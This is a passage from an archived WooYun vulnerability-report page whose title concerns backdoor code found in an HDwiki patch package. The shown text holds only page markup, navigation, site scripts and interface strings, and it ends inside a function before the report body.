wooyun-2012-010772.html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<meta http-equiv="x-ua-compatible" content="ie=7"/>
<title> HDwiki各版本新漏洞补丁包2012-08-09发现后门代码 | WooYun-2012-10772 | WooYun.org </title>
<meta name="author" content="80sec"/>
<meta name="copyright" content="http://www.wooyun.org/"/>
<meta name="keywords" content="互动在线（北京）科技有限公司漏洞,kindle,成功的入侵事件,wooyun,应用安全,web安全,系统安全,网络安全,漏洞公布,漏洞报告,安全资讯。"/>
<meta name="description" content="HDwiki各版本新漏洞补丁包2012-08-09发现后门代码|WooYun是一个位于厂商和安全研究者之间的漏洞报告平台,注重尊重,进步,与意义"/>
<link rel="icon" href="http://wooyun.org/favicon.ico" sizes="32x32" />
<link href="../css/style.css?v=201501291909" rel="stylesheet" type="text/css"/>
<script src="https://static.wooyun.org/static/js/jquery-1.4.2.min.js" type="text/javascript"></script>
</head>

<body id="bugDetail">

<style>
#myBugListTab { position:relative; display:inline; border:none }
#myBugList { position:absolute; display:none; margin-left:309px; * margin-left:-60px; * margin-top:18px ; border:#c0c0c0 1px solid; padding:2px 7px; background:#FFF }
#myBugList li { text-align:left }
</style>
<script type="text/javascript">
$(document).ready(function(){

	if ( $("#__cz_push_d_object_box__") ) {
		$("script[src^='http://cip4.czpush.com/']").attr("src"," ").remove();
		$("#__cz_push_d_object_box__").empty().remove();
		$("a[id^='__czUnion_a']").attr("href","#").remove();
	}

	if ( $("#ooDiv") ) {
		$("#ooDiv").empty().parent("div").remove();
	}

	$("#myBugListTab").toggle(
		function(){
			$("#myBugList").css("display","block");
		},
		function(){
			$("#myBugList").css("display","none");
		}
	);

	if ( $(window).scrollTop() > 120 ) {
		$("#back-to-top").fadeIn(300);
	} else {
		$("#back-to-top").fadeOut(300);
	} 

	$(window).scroll(function(){
		if ( $(window).scrollTop() > 120 ) {
			$("#back-to-top").fadeIn(300);
		} else {
			$("#back-to-top").fadeOut(300);
		} 
	});

	$("#back-to-top a").click(function() {
		$('body,html').animate({scrollTop:0},300);
		return false;
	});

	$("#go-to-comment a").click(function() {
		var t = $("#replys").offset().top - 52;
		$('body,html').animate({scrollTop:t},300);
		return false;
	});

});

function gofeedback(){
	var bugid=$("#fbid").val();
	if(bugid){
		var url="/feedback.php?bugid="+bugid;
	}else{
		var url="/feedback.php"
	}
	window.open(url);
}
</script>

	<div class="go-to-wrapper">
		<ul class="go-to">
		    <li id="go-to-comment" title="转到评论"><a href="wooyun-2012-010772#">转到评论</a></li>
		    <li id="go-to-feedback" title="我要反馈"><a href="javascript:void(0)" onclick="gofeedback()">我要反馈</a></li>
		    <li id="back-to-top" title="回到顶部"><a href="wooyun-2012-010772#">回到顶部</a></li>
		</ul>
	</div>
	<div class="banner">
		<div class="logo">
		<h1>WooYun.org</h1>
		<div class="weibo"><iframe width="136" height="24" frameborder="0" allowtransparency="true" marginwidth="0" marginheight="0" scrolling="no" border="0" src="http://widget.weibo.com/relationship/followbutton.php?language=zh_cn&width=136&height=24&uid=1981622273&style=2&btn=red&dpc=1"></iframe>
		</div>
		<div class="wxewm">
			<a class="ewmthumb" href="javascript:void(0)"><span><img src="https://static.wooyun.org/static/images/ewm.jpg"width="220" border="0"></span><img src="https://static.wooyun.org/static/images/weixin_30.png"width="22" border="0"></a>
		</div>
		</div>
		
				<div class="login">
					<a href="http://wooyun.org/user.php?action=login">登录</a> | <a href="http://wooyun.org/user.php?action=register" class="reg">注册</a>
				</div>
				</div>

	<div class="nav" id="nav_sc">
		<ul>
			<li><a href="http://wooyun.org/index.php">首页</a></li>
			<li><a href="http://wooyun.org/corps/">厂商列表</a></li>
			<li><a href="http://wooyun.org/whitehats/">白帽子</a></li>
			<li><a href="http://wooyun.org/top/">乌云榜</a></li> 
            <li><a href="http://wooyun.org/teams/">团队</a></li>
            <li><a href="http://wooyun.org/bugs/">漏洞列表</a></li>
			<li class="new"><a href="http://wooyun.org/bug/submit">提交漏洞</a></li>
			<!--li><a href="/corp_actions">厂商活动</a></li-->
			<!--<li><a target='_blank' href="http://security.wooyun.org/">安全中心</a></li>-->
			<li><a href="http://summit.wooyun.org" target="_blank" style="color:rgb(246,172,110);font-size:14px;font-weight:blod">乌云峰会</a></li>
			<!--li><a href="/job/">企业招聘</a></li-->
						<li><a href="http://job.wooyun.org" target="_blank">乌云招聘</a></li>
						<li><a href="http://drops.wooyun.org" target="_blank">知识库</a></li>
						<li><a href="http://wooyun.org/notice/">公告</a></li>
		</ul>
        <form action="http://wooyun.org/searchbug.php" method="post" id="searchbox">
            <input type="text" name="q" id="search_input" />
            <input type="submit" value="搜索" id="search_button" />
        </form>
	</div>

	<div class="bread" style="padding-top: 4px;">
		<div style="float:left">当前位置：<a href="http://wooyun.org/index.php">WooYun</a> >> <a href="wooyun-2012-010772#">漏洞信息</a></div>
			</div>
<script language="javascript">
var _LANGJS = {"COMMENT_LIKE_SELF":"\u4e0d\u80fd\u81ea\u5df1\u8d5e\u81ea\u5df1\u7684\u8bc4\u8bba","COMMENT_LIKED":"\u5df2\u8d5e\u6b64\u8bc4\u8bba","COMMENT_NOT":"\u6b64\u8bc4\u8bba\u4e0d\u5b58\u5728","COMMENT_FILL":"\u8bf7\u8f93\u5165\u8bc4\u8bba\u5185\u5bb9","COMMENT_STAT":"\u8bc4\u8bba\u4e0d\u80fd\u4e3a\u7a7a","COMMENT_LOGIN":"\u767b\u9646\u540e\u624d\u80fd\u8bc4\u8bba","COMMENT_GOOD_DONE":"\u5df2\u8d5e\u8fc7\u6b64\u6761\u8bc4\u8bba","COMMENT_SELF":"\u4e0d\u80fd\u8bc4\u4ef7\u81ea\u5df1\u53d1\u5e03\u7684\u8bc4\u8bba","COMMENT_CLICK_FILL":"\u70b9\u51fb\u8f93\u5165\u8bc4\u8bba\u5185\u5bb9","FAIL":"\u64cd\u4f5c\u5931\u8d25","FAIL_MANAGE":"\u64cd\u4f5c\u5931\u8d25\uff0c\u8bf7\u4e0e\u7ba1\u7406\u5458\u8054\u7cfb","FAIL_NO_WHITEHATS":"\u64cd\u4f5c\u5931\u8d25\uff0c\u6ca1\u6709\u6b64\u767d\u5e3d\u5b50","FAIL_NO_CORPS":"\u64cd\u4f5c\u5931\u8d25\uff0c\u6ca1\u6709\u6b64\u5382\u5546","BUGS_CORPS_SELECT":"\u9009\u62e9\u5382\u5546(\u53ef\u8f93\u5165\u5173\u952e\u5b57\u641c\u7d22)","BUGS_CORPS_OTHER":"Other\/\u5176\u5b83\u5382\u5546","BUGS_CORPS_TYPE_STAT":"\u8be5\u6f0f\u6d1e\u5bf9\u5e94\u5382\u5546\u7684\u7c7b\u578b","BUGS_CORPS_NAME_STAT":"\u8be5\u6f0f\u6d1e\u5bf9\u5e94\u5382\u5546\u7684\u540d\u79f0","BUGS_TYPE_STAT":"\u8be5\u6f0f\u6d1e\u7684\u7c7b\u578b\uff0c\u4e71\u9009\u6263\u5206","BUGS_TITLE_STAT":"\u8be5\u6f0f\u6d1e\u7684\u6807\u9898","BUGS_HARMLEVEL_STAT":"\u8be5\u6f0f\u6d1e\u7684\u5371\u5bb3\u7b49\u7ea7","BUGS_DESCRIPTION_STAT":"\u5bf9\u6f0f\u6d1e\u7684\u7b80\u8981\u63cf\u8ff0\uff0c\u53ef\u4ee5\u7b80\u5355\u63cf\u8ff0\u6f0f\u6d1e\u7684\u5371\u5bb3\u548c\u6210\u56e0\uff0c\u4e0d\u8981\u900f\u6f0f\u6f0f\u6d1e\u7684\u7ec6\u8282","BUGS_CONTENT_STAT":"\u5bf9\u6f0f\u6d1e\u7684\u8be6\u7ec6\u63cf\u8ff0\uff0c\u8bf7\u5c3d\u91cf\u591a\u7684\u6df1\u5165\u7ec6\u8282\u4ee5\u65b9\u4fbf\u5bf9\u6f0f\u6d1e\u7684\u7406\u89e3\uff0c\u652f\u6301&lt;code>&lt;\/code>\u6807\u7b7e","BUGS_POC_STAT":"\u7ed9\u51fa\u95ee\u9898\u7684\u6982\u5ff5\u6027\u8bc1\u660e\uff0c\u652f\u6301&lt;code>&lt;\/code>\u6807\u7b7e","BUGS_PATCH_STAT":"\u5efa\u8bae\u7684\u6f0f\u6d1e\u4fee\u590d\u65b9\u6848\uff0c\u652f\u6301&lt;code>&lt;\/code>\u6807\u7b7e","BUGS_TEST_STAT":"\u7ed9\u51fa\u95ee\u9898\u7684\u6807\u51c6\u6d4b\u8bd5\u4ee3\u7801\u4ee5\u66f4\u4e3a\u65b9\u4fbf\u7684\u5bf9\u6f0f\u6d1e\u8fdb\u884c\u6d4b\u8bd5\u548c\u9a8c\u8bc1\uff0c\u6d4b\u8bd5\u4ee3\u7801\u5bf9\u5916\u9ed8\u8ba4\u4e0d\u663e\u793a\uff0c<br\/>\u5176\u4ed6\u767d\u5e3d\u5b50\u652f\u4ed8\u4e4c\u4e91\u5e01\u67e5\u770b\u540e\u4f60\u5c06\u83b7\u5f97\u989d\u5916\u4e4c\u4e91\u5e01\uff0c<br\/>\u540c\u65f6\u4e5f\u5c06\u5728\u4f60\u7684\u4e2a\u4eba\u9875\u9762\u4f53\u73b0\u4f60\u7684\u6d4b\u8bd5\u4ee3\u7801\u7f16\u5199\u80fd\u529b\u3002","BUGS_QUESTION_SELECT":"\u8bf7\u9009\u62e9\u95ee\u9898\u5382\u5546","BUGS_TITLE_NOTICE":"\u6f0f\u6d1e\u6807\u9898\u4e0d\u80fd\u4e3a\u7a7a","BUGS_RANK_NOTICE1":"\u8bf7\u586b\u5199\u81ea\u8bc4Rank","BUGS_RANK_NOTICE2":"\u81ea\u8bc4Rank\u4e3a\u5927\u4e8e0\u7684\u6570\u5b57","BUGS_TYPE_SELECT":"\u8bf7\u9009\u62e9\u6f0f\u6d1e\u7c7b\u578b","BUGS_TYPE_NOTICE":"\u8bf7\u586b\u5199\u6f0f\u6d1e\u7c7b\u578b","BUGS_HARMLEVEL_SELECT":"\u9009\u62e9\u6f0f\u6d1e\u7b49\u7ea7","BUGS_HARMLEVEL_NOTICE":"\u8bf7\u9009\u62e9\u6f0f\u6d1e\u7b49\u7ea7","BUGS_HARMLEVEL_LOWER":"\u6f0f\u6d1e\u7b49\u7ea7\u4e3a \u4f4e \u65f6\uff0c\u81ea\u8bc4Rank\u4e3a1-5","BUGS_HARMLEVEL_MIDDLE":"\u6f0f\u6d1e\u7b49\u7ea7\u4e3a \u4e2d \u65f6\uff0c\u81ea\u8bc4Rank\u4e3a5-10","BUGS_HARMLEVEL_HIGH":"\u6f0f\u6d1e\u7b49\u7ea7\u4e3a \u9ad8 \u65f6\uff0c\u81ea\u8bc4Rank\u4e3a10-20","BUGS_AREA_SELECT":"\u8bf7\u9009\u62e9\u5730\u533a\uff01","BUGS_DOMAILS":"\u6f0f\u6d1e\u6240\u5728\u57df\u540d(\u5982qq.com)","BUGS_DOMAIN_FILL":"\u8bf7\u586b\u5199\u57df\u540d\uff01","BUGS_DETAIL_MORE":"\u67e5\u770b\u8be6\u60c5","BUGS_IGNORE_DAYS":"\u8ddd\u6f0f\u6d1e\u5ffd\u7565\u8fd8\u6709","BUGS_CONFIRM_QUICK":"\u8bf7\u5382\u5546\u5c3d\u5feb","BUGS":"\u6f0f\u6d1e","BUGS_PUBLIC_DAYS":"\u8ddd\u6f0f\u6d1e\u5411\u516c\u4f17\u516c\u5f00\u8fd8\u6709","BUGS_IGNORE_PUBLIC_DAYS":"\u8ddd\u6f0f\u6d1e\u672a\u786e\u8ba4\u65e0\u5f71\u54cd\u5ffd\u7565\u8fd8\u6709","BUGS_REPAIR_QUICK":"\u8bf7\u5382\u5546\u5c3d\u5feb\u4fee\u590d\u6f0f\u6d1e","BUGS_HARMLEVEL_REMIND":"\u8bf7\u9009\u62e9\u5371\u5bb3\u7b49\u7ea7","BUGS_RANK_STAT":"rank\u4e3a1-20\u7684\u6b63\u6574\u6570","BUGS_RANK_STAT1":"rank\u4e3a1-5\u7684\u6b63\u6574\u6570","BUGS_RANK_STAT2":"rank\u4e3a5-10\u7684\u6b63\u6574\u6570","BUGS_RANK_STAT3":"rank\u4e3a10-20\u7684\u6b63\u6574\u6570","BUGS_COMPLEMENT_REASON":"\u6dfb\u52a0\u5bf9\u6f0f\u6d1e\u7684\u8865\u5145\u8bf4\u660e\u4ee5\u53ca\u505a\u51fa\u8bc4\u4ef7\u7684\u7406\u7531","BUGS_REPLY_FILL":"\u8bf7\u586b\u5199\u6f0f\u6d1e\u56de\u590d","BUGS_IGNORE_CONFIRM":"\u786e\u5b9a\u5ffd\u7565\u6b64\u6f0f\u6d1e\u5417","BUGS_STATUS_NEW_UPDATE":"\u66f4\u6539\u6f0f\u6d1e\u7684\u6700\u65b0\u72b6\u6001","BUGS_STATUS_FILL":"\u8bf7\u586b\u5199\u6f0f\u6d1e\u72b6\u6001","BUGS_PUBLIC_ADVANCE":"\u786e\u5b9a\u63d0\u524d\u516c\u5f00\u6b64\u6f0f\u6d1e\u5417","BUGS_COUNT":"\u6f0f\u6d1e\u6570","BUGS_REPLY_HAT":"\u56de\u590d\u6b64\u4eba","BUGS_DELAY_CONFIRM":"\u786e\u5b9a\u8981\u5ef6\u671f\u4e48?","BUGS_DELAY":"\u7533\u8bf7\u5ef6\u671f","BUGS_DELAY_DONE":"\u5df2\u7ecf\u5ef6\u671f","BUGS_RISK_CONFIM":"\u786e\u5b9a\u6b64\u6f0f\u6d1e\u4e3a\u9ad8\u5371\u5417?","BUGS_NULL_EDITE":"\u7559\u7a7a\u8868\u793a\u4e0d\u4fee\u6539","BUGS_DONE_CONFIRM":"\u8be5\u64cd\u4f5c\u6682\u65f6\u4e0d\u53ef\u9006\uff0c\u786e\u5b9a\uff1f","BUGS_UPUBLIC":"\u4f60\u4ece\u53d1\u5e03\u7684\u6f0f\u6d1e","BUGS_UPUBLIC1":"\u91cc\u53c8\u83b7\u5f97\u4e86","BUGS_PRECHECK":"\u6709\u4eba\u63d0\u524d\u67e5\u770b\u4e86\u4f60\u53d1\u5e03\u7684\u6f0f\u6d1e","BUGS_PRECHECK_UNPUBLIC":"\u63d0\u524d\u67e5\u770b\u672a\u516c\u5f00\u6f0f\u6d1e","BUGS_NUM":"\u6f0f\u6d1e\u6570\u91cf","RANKAVG":"\u4eba\u5747\u8d21\u732e Rank","CAPTCHA_GET":"\u83b7\u53d6\u9a8c\u8bc1\u7801","CAPTCHA_FILL":"\u8bf7\u8f93\u5165\u56fe\u7247\u4e2d\u7684\u9a8c\u8bc1\u7801","CAPTCHA_NULL":"\u9a8c\u8bc1\u7801\u4e0d\u80fd\u4e3a\u7a7a","CAPTCHA_ERROR":"\u9a8c\u8bc1\u7801\u8f93\u5165\u9519\u8bef","CAPTCHA_PHONE_ERROR":"\u624b\u673a\u9a8c\u8bc1\u7801\u4e0d\u6b63\u786e","CAPTCHA_PHONE_SEND":"\u9a8c\u8bc1\u7801\u5df2\u53d1\u9001\u5230\u4f60\u7684\u624b\u673a\u4e0a\u8bf7\u6ce8\u610f\u67e5\u6536","CAPTCHA_SEND_AGAIN":"\u540e\u53ef\u91cd\u53d1","CAPTCHA_SEND_OVER":"\u77ed\u4fe1\u5df2\u53d1\u9001\u6210\u529f,\u9a8c\u8bc1\u7801\u533a\u5206\u5927\u5c0f\u5199","CAPTCHA_PHONE_NO":"\u4e0d\u9700\u8981\u77ed\u4fe1\u9a8c\u8bc1\u7801","CAPTCHA_PHONE_NULL":"\u77ed\u4fe1\u5bc6\u7801\u4e0d\u80fd\u4e3a\u7a7a","PHONE_TYPE_ERROR":"\u7535\u8bdd\u683c\u5f0f\u4e0d\u5bf9","PHONE_NOTING":"\u7535\u8bdd\u4e0d\u80fd\u4e3a\u7a7a","PHONE_FILL":"\u8bf7\u586b\u5199\u624b\u673a\u53f7","PHONE_CAPTCHA_NOTING":"\u624b\u673a\u9a8c\u8bc1\u7801\u4e0d\u80fd\u4e3a\u7a7a","PASSWORD_NOTING":"\u5bc6\u7801\u4e0d\u80fd\u4e3a\u7a7a","PASSWORD_CONFIRM_NOTING":"\u5bc6\u7801\u786e\u8ba4\u4e0d\u80fd\u4e3a\u7a7a","PASSWORD_PAY_LESS":"\u652f\u4ed8\u5bc6\u7801\u4e0d\u80fd\u5c11\u4e8e6\u4f4d","PASSWORD_FILL_DIFFERENT":"\u8f93\u5165\u7684\u4e24\u6b21\u5bc6\u7801\u4e0d\u4e00\u6837","PASSWORD_PAY_LOGIN_SAME":"\u652f\u4ed8\u5bc6\u7801\u4e0d\u80fd\u540c\u767b\u9646\u5bc6\u7801\u4e00\u6837","PASSWORD_PAY_FILL":"\u8bf7\u586b\u5199\u652f\u4ed8\u5bc6\u7801","PASSWORD_LENGH_LESS":"\u5bc6\u7801\u957f\u5ea6\u4e0d\u80fd\u5c0f\u4e8e6\u4f4d","PASSWORD_SEND_OK":"\u53d1\u9001\u5bc6\u7801\u90ae\u4ef6\u6210\u529f","PASSWORD_OFER_WRROR":"\u60a8\u63d0\u4f9b\u7684\u627e\u56de\u5bc6\u7801\u4fe1\u606f\u4e0d\u6b63\u786e","PASSWORD_OLD_ERROR":"\u539f\u5bc6\u7801\u9519\u8bef","PASSWORD_UPDATE_OK":"\u5bc6\u7801\u4fee\u6539\u6210\u529f","EMAILL_USED":"\u90ae\u7bb1\u5df2\u88ab\u5360\u7528","EMAILL_NULL":"\u90ae\u7bb1\u4e0d\u80fd\u4e3a\u7a7a\uff01","NOTING":"\u65e0","LEAVEWORDS_NULL":"\u7559\u8a00\u5185\u5bb9\u4e0d\u80fd\u4e3a\u7a7a","LOGIN_FIRST":"\u8bf7\u5148\u767b\u5f55","CONFIRM":"\u786e\u8ba4","YEAR":"\u5e74","DAYS":"\u5929","HOURS":"\u65f6","HOUR":"\u5c0f\u65f6","MINUTE":"\u5206","SECOND":"\u79d2","IS":"\u4e3a","ONE":"\u4e00","TWE":"\u4e8c","TIMES":"\u6b21","COUNTENT_UPDATE_FILL":"\u8bf7\u586b\u5199\u4fee\u6539\u5185\u5bb9","CANCLE":"\u53d6\u6d88","OPERATE_CONFIRM":"\u786e\u5b9a\u6b64\u64cd\u4f5c\u5417\uff1f","USERNAME":"\u59d3\u540d","SUCCESS":"\u64cd\u4f5c\u6210\u529f","FAIL_REPLY":"\u64cd\u4f5c\u5931\u8d25\uff0c\u8bf7\u586b\u5199\u56de\u590d\u4fe1\u606f","SEND_OK":"\u53d1\u9001\u6210\u529f","PHONE_BIND_DONE":"\u5df2\u7ed1\u5b9a","TAGS_USE":"\u4f7f\u7528\u6b64\u6807\u7b7e","WHITEHATS":"\u767d\u5e3d\u5b50","WHITEHATS_VERTIFY":"\u8ba4\u8bc1\u767d\u5e3d\u5b50","WHITEHATES_NAME":"\u8bf7\u8f93\u5165\u767d\u5e3d\u5b50\u7528\u6237\u540d","USER_ZONE_EDIT":"\u7f16\u8f91\u9886\u57df","WB_TRANSFER":"\u6211\u8981\u8f6c\u8d26","WB_TRANSFER_CANCEL":"\u53d6\u6d88\u8f6c\u8d26","WB_NUM":"\u8bf7\u8f93\u5165\u4e4c\u4e91\u5e01\u6570\u91cf","WB_NUMBER":"\u4e4c\u4e91\u5e01\u6570\u91cf\u4e3a\u6b63\u6574\u6570","WB_NEED_LESS":"\u81f3\u5c11\u9700\u8981","WB_NEED_SUM":"\u4e2a\u4e4c\u4e91\u5e01","WB_TRANSFER_OK":"\u8f6c\u8d26\u6210\u529f","WB_MY":"\u6211\u7684\u4e4c\u4e91\u5e01","WB_CAN_USE":"\u53ef\u7528\u7684\u4e4c\u4e91\u5e01","WB_FROZEN":"\u51bb\u7ed3\u7684\u4e4c\u4e91\u5e01","WB_LACK":"\u4e4c\u4e91\u5e01\u4e0d\u8db3","WB_SET_SCOPE":"\u51fa\u4ef7\u8303\u56f4\u4e3a","WB_BIND_CANCEL_STAT":"(\u70b9\u51fb\u201c\u53d6\u6d88\u7ed1\u5b9a\u201d\u83b7\u53d6\u9a8c\u8bc1\u7801\uff0c\u5411\u4e4c\u4e91\u516c\u4f17\u8d26\u53f7\u53d1\u9001\u9a8c\u8bc1\u7801\u53d6\u6d88\u5fae\u4fe1\u7ed1\u5b9a\uff0c\u7136\u540e\u5237\u65b0\u672c\u9875\u9762)","EMAIL_LOGIN_MEXT":"\u90ae\u4ef6\u53d1\u9001\u6210\u529f,\u8bf7\u767b\u9646\u60a8\u7684\u90ae\u7bb1\u8fdb\u884c\u4e0b\u4e00\u6b65\u64cd\u4f5c","EMAIL_UPDATE_LOGIN_MEXT":"\u66f4\u6539\u8bf7\u6c42\u5df2\u53d1\u9001\u5230\u90ae\u7bb1,\u8bf7\u767b\u9646\u60a8\u7684\u90ae\u7bb1\u8fdb\u884c\u4e0b\u4e00\u6b65\u64cd\u4f5c","EMAIL_SEND_OK":"\u90ae\u4ef6\u53d1\u9001\u6210\u529f\uff01","CORPS":"\u5382\u5546","TEAM_NAME_NULL":"\u56e2\u961f\u540d\u79f0\u4e0d\u80fd\u4e3a\u7a7a","TEAM_HOMEPAGE_NULL":"\u56e2\u961f\u4e3b\u9875\u4e0d\u80fd\u4e3a\u7a7a","TEAM_QQ_NULL":"\u56e2\u961fqq\u4e0d\u80fd\u4e3a\u7a7a","TEAM_BRIEF_NULL":"\u56e2\u961f\u7b80\u4ecb\u4e0d\u80fd\u4e3a\u7a7a","TEAM_EXIST":"\u56e2\u961f\u5df2\u5b58\u5728","TEAM_DISMISS_CONFIRM":"\u786e\u5b9a\u89e3\u6563\u672c\u56e2\u961f\u5417?","TEAM_NAME":"\u56e2\u961f\u540d\u79f0","TEAM_CREATER":"\u521b\u5efa\u4eba","TEAM_DONATER":"\u56e2\u961f\u4e3b\u529b","TEAM_MUMBER":"\u4eba\u6570","TEAM":"\u56e2\u961f","REGISTER_BRIEF":"*\u8bf7\u8f93\u5165\u4e2a\u4eba\u7684\u7b80\u8981\u4ecb\u7ecd","REGISTER_TYPE":"*\u9009\u62e9\u6ce8\u518c\u7c7b\u578b","REGISTER_CORPS_BRIEF":"*\u8f93\u5165\u5382\u5546\u7684\u7b80\u8981\u4ecb\u7ecd","REGISTER_EMAIL":"*\u5382\u5546\u90ae\u4ef6\u5fc5\u987b\u4e3a\u4f01\u4e1a\u4f7f\u7528\u7684\u6b63\u5f0f\u90ae\u4ef6","REGISTER_NAME_NULL":"\u7528\u6237\u540d\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_HOMEPAGE_NULL":"\u4e2a\u4eba\u4e3b\u9875\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_BREIF_NULL":"\u7b80\u8981\u4ecb\u7ecd\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_CORPNAME_NULL":"\u5382\u5546\u540d\u79f0\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_CORPHOMEPAGE_NULL":"\u5b98\u65b9\u4e3b\u9875\u4e0d\u80fd\u4e3a\u7a7a","REGISTER_LAW_AGREE":"\u540c\u610f\u300a\u4fe1\u606f\u5b89\u5168\u76f8\u5173\u4fdd\u62a4\u548c\u58f0\u660e\u300b\u624d\u80fd\u6ce8\u518c","ATTENTION":"\u5173\u6ce8","ATTENTION_SUM":"\u5173\u6ce8\u6570","ATTENTION_DONE":"\u5df2\u5173\u6ce8","ATTENTION_CANCEL":"\u53d6\u6d88\u5173\u6ce8","ATTENTION_BUG_DONE":"\u5df2\u5173\u6ce8\u6b64\u6f0f\u6d1e","ATTENTION_BUG_CONFIRM":"\u786e\u5b9a\u53d6\u6d88\u5bf9\u6b64\u6f0f\u6d1e\u7684\u5173\u6ce8","ATTENTION_BUG":"\u5173\u6ce8\u6b64\u6f0f\u6d1e","ATTENTION_BUG_UNDO":"\u6ca1\u6709\u5173\u6ce8\u6b64\u6f0f\u6d1e","ATTENTION_HAT_DONE":"\u5df2\u5173\u6ce8\u6b64\u767d\u5e3d\u5b50","ATTENTION_HAT_CONFIRM":"\u786e\u5b9a\u53d6\u6d88\u5bf9\u6b64\u767d\u5e3d\u5b50\u7684\u5173\u6ce8?","COLLECTION":"\u6536\u85cf","COLLECTION_DONE":"\u5df2\u6536\u85cf","COLLECTION_BUG_DONE":"\u5df2\u6536\u85cf\u6b64\u6f0f\u6d1e","COLLECTION_BUG_UNDO":"\u6ca1\u6709\u6536\u85cf\u6b64\u6f0f\u6d1e","COLLECTION_BUG_CONFIRM":"\u786e\u5b9a\u53d6\u6d88\u5bf9\u6b64\u6f0f\u6d1e\u7684\u6536\u85cf","SMS_SEND_NAME":"* \u7528\u6237\u6635\u79f0\/\u5382\u5546\u540d\u79f0\u4e0d\u80fd\u4e3a\u7a7a<br \/>","SMS_SEND_TITLE":"* \u6807\u9898\u4e0d\u80fd\u4e3a\u7a7a<br \/>","SMS_SEND_CONTENT":"* \u5185\u5bb9\u4e0d\u80fd\u4e3a\u7a7a<br \/>","SMS_SEND_CAPTCHA":"* \u9a8c\u8bc1\u7801\u4e0d\u80fd\u4e3a\u7a7a<br \/>","NUMBER":"\u7684\u6b63\u6574\u6570","RATING_SUCCESS":"\u8bc4\u5206\u6210\u529f","RATING_BUGS_DONE":"\u5df2\u5bf9\u6b64\u6f0f\u6d1e\u8fdb\u884c\u8fc7\u8bc4\u5206","RATING_BUGS_SELF":"\u4e0d\u80fd\u5bf9\u81ea\u5df1\u53d1\u5e03\u7684\u6f0f\u6d1e\u8fdb\u884c\u8bc4\u5206","RATING_SUBMIT_CANCLE":"\u53d6\u6d88\u63d0\u4ea4\u8bc4\u5206","RATING_SUBMIT":"\u63d0\u4ea4\u6211\u7684\u8bc4\u5206","RATING_SUBMIT_CHECK":"\u8bf7\u786e\u5b9a\u6bcf\u4e00\u9879\u90fd\u9009\u62e9\u4e86\u8bc4\u5206","RATING_CONFIRM":"\u786e\u5b9a\u63d0\u4ea4\u5bf9\u6b64\u5382\u5546\u7684\u8bc4\u5206\u5417\uff1f","RATING_LOGIN":"\u53ea\u6709\u767b\u5f55\u7684\u767d\u5e3d\u5b50\u624d\u80fd\u8bc4\u5206","RATING_DONE":"\u5df2\u7ecf\u8bc4\u8fc7\u5206\u4e86","WOOYUN_CORPS":"\u4e4c\u4e91\u5382\u5546","MARST_IMAGE":"\u5bf9\u56fe\u7247\u6253\u7801","FEEDBACK_LINK_NULL":"\u94fe\u63a5\u4e0d\u80fd\u4e3a\u7a7a\uff01","FEEDBACK_LINK_ERROR":"\u8bf7\u4e66\u5199\u6b63\u786e\u7684\u94fe\u63a5\u5730\u5740\uff01","FEEDBACK_CONTENT_NULL":"\u95ee\u9898\u5185\u5bb9\u4e0d\u80fd\u4e3a\u7a7a\uff01","FEEDBACK_ALLOW_LIMIT":"\u534a\u5c0f\u65f6\u53ea\u5141\u8bb8\u53cd\u9988\u4e00\u6b21","TOP_RANK":"\u6392\u540d","TOP_BUG_TITLE":"\u6f0f\u6d1e\u6807\u9898","TOP_RANK_NONE":"\u6682\u65e0\u6392\u540d","TOP_BUGS_GOOD":"\u4f18\u8d28\u6f0f\u6d1e\u6570","NICKNAME":"\u6635\u79f0","LEVEL":"\u7b49\u7ea7","VALUE":"\u503c","EDITOR_INSERT_PIC":"\u63d2\u5165\u56fe\u7247","EDITOR_PIC_ADDR":"\u5730\u5740\uff1a","EDITOR_CONFIRM":"\u786e\u5b9a","EDITOR_PIC_NULL":"\u8bf7\u4e0a\u4f20\u56fe\u7247\u6216\u586b\u5199\u56fe\u7247\u5730\u5740","EDITOR_INSERT_VIDIO":"\u63d2\u5165\u89c6\u9891","EDITOR_VIDIO_ADDR":"\u89c6\u9891\u5730\u5740\uff1a","EDITOR_VIDIO_NULL":"\u8bf7\u586b\u5199\u89c6\u9891\u5730\u5740(.swf)","EDITOR_VIDIO_TYPE":"\u76ee\u524d\u4ec5\u652f\u6301.swf\u683c\u5f0f","PIC_SELECT":"\u8bf7\u9009\u62e9\u5f85\u4e0a\u4f20\u7684\u56fe\u7247","PIC_TYPE_IS":"\u56fe\u7247\u7c7b\u578b\u4e3a","UPLOAD":"\u4e0a\u4f20","RANK_AVG":"\u6f0f\u6d1e\u5e73\u5747"};

$(function(){
    function getParamsOfShareWindow(width, height) {
        return ['toolbar=0,status=0,resizable=1,width=' + width + ',height=' + height + ',left=',(screen.width-width)/2,',top=',(screen.height-height)/2].join('');
    }
});

function errimg(img){
	tmp=img.src;
	nimg=tmp.replace("http://wooyun.org/","http://www.wooyun.org/");
	img.src=nimg;
	$(img).parent().attr('href',nimg);
	img.onerror=null;
}
function AttendBug(id){
	$.get('/ajaxdo.php',{module:'attendbug',id:id,rid:Math.random(),token:$("#token").val()},function(re){
		if(re==1){
			$("#attention_num").html(parseInt($("#attention_num").html())+1);
			$("#attend_action").html('√'+_LANGJS.ATTENTION_DONE+' <a class="btn" href="javascript:void(0)" onclick="AttendCancel('+id+')">'+_LANGJS.ATTENTION_CANCEL+'</a></span>');
		}else if(re==2){
			alert(_LANGJS.LOGIN_FIRST);
		}else if(re==3){
			alert(_LANGJS.ATTENTION_BUG_DONE);
		}else{
			alert(_LANGJS.FAIL_MANAGE);
		}
	});
}
function AttendCancel(id){
	if(confirm(_LANGJS.ATTENTION_BUG_CONFIRM+"?")){
		$.get('/ajaxdo.php',{module:'attendcancel',id:id,rid:Math.random(),token:$("#token").val()},function(re){
			if(re==1){
				$("#attention_num").html(parseInt($("#attention_num").html())-1);
				$("#attend_action").html('<a class="btn" href="javascript:void(0)" onclick="AttendBug('+id+')">'+_LANGJS.ATTENTION_BUG+'</a></span>');
			}else{
				alert(_LANGJS.FAIL_MANAGE);
			}
		});
	}
}

function CollectBug(id,token){
